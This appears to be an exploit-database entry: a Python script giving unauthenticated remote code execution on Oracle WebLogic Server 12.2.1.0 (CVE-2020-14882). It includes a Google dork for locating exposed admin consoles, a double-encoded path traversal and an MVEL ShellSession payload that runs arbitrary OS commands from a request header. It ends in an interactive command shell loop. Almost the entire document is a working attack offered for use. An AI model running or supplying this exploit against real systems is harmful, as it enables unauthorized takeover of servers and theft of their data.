Oracle WebLogic Server 12.2.1.0 unauthenticated remote code execution exploit.
dc903fd515970b9e6798c28900acc487
# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
# Google Dork: inurl:\\\"/console/login/LoginForm.jsp\\\"
# Date: 25/1/2021
# Exploit Author: CHackA0101
# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
# Version: Oracle WebLogic Server, version 12.2.1.0
# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux)
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
# CVE : CVE-2020-14882
# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md
#!/usr/bin/python3
import requests
import argparse
import http.client
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = \\\'HTTP/1.0\\\'
parse = argparse.ArgumentParser()
parse.add_argument(\\\'-u\\\', \\\'--url\\\', help=\\\'url\\\')
args = parse.parse_args()
proxies = {\\\'http\\\' : \\\'127.0.0.1:8080\\\'}
cmd_ = \\\"\\\"
# Headers
headers = {
\\\"User-Agent\\\": \\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\",
\\\"Accept\\\": \\\"application/json, text/plain, */*\\\",
\\\"Accept-Language\\\": \\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\",
\\\"Accept-Encoding\\\": \\\"gzip, deflate\\\",
\\\"Upgrade-Insecure-Requests\\\": \\\"1\\\",
\\\"Content-Type\\\": \\\"application/x-www-form-urlencoded\\\",
\\\"Cache-Control\\\": \\\"max-age=0\\\",
\\\"Connection\\\": \\\"close\\\"
}
# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:
url = args.url + \\\"\\\"\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec();\\\");\\\"\\\"\\\"
url_ = args.url + \\\"/console/images/%252E%252E%252Fconsole.portal\\\"
form_data_ = \\\"\\\"\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\"connectionHandler\\\");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\"getServletRequest\\\").invoke(obj);
String cmd = req.getHeader(\\\"cmd\\\");
String[] cmds = System.getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"window\\\") ? new String[]{\\\"cmd.exe\\\", \\\"/c\\\", cmd} : new String[]{\\\"/bin/sh\\\", \\\"-c\\\", cmd};
if (cmd != null) {
String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\"\\\\\\\\\\\\A\\\").next();
weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\"getResponse\\\").invoke(req);
res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
res.getServletOutputStream().flush();
res.getWriter().write(\\\"\\\");
}executeThread.interrupt();
\\\");\\\"\\\"\\\"
#data_ = parse.urlencode(form_data_)
results1 = requests.get(url, headers=headers)
if results1.status_code == 200:
print(\\\"(Load Headers... \\\\n\\\")
print(\\\"(Data urlencode... \\\\n\\\")
print(\\\"(Execute exploit... \\\\n\\\")
print(\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\n\\\")
while True:
cmd_test = input(\\\"(CHackA0101GNU/Linux)$ \\\")
if cmd_test == \\\"exit\\\":
break
else:
try:
cmd_ = cmd_test
headers = {
\\\'cmd\\\': cmd_,
\\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\',
\\\'User-Agent\\\': \\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\',
\\\'Accept\\\': \\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\',
\\\'Connection\\\': \\\'close\\\',
\\\'Accept-Encoding\\\': \\\'gzip, deflate\\\',
\\\'Content-Length\\\': \\\'1244\\\',
\\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\'
}
results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
print(results_)
except:
pass
else:
print(\\\"(CHackA0101GNU/Linux)$ Fail.\\\\n\\\")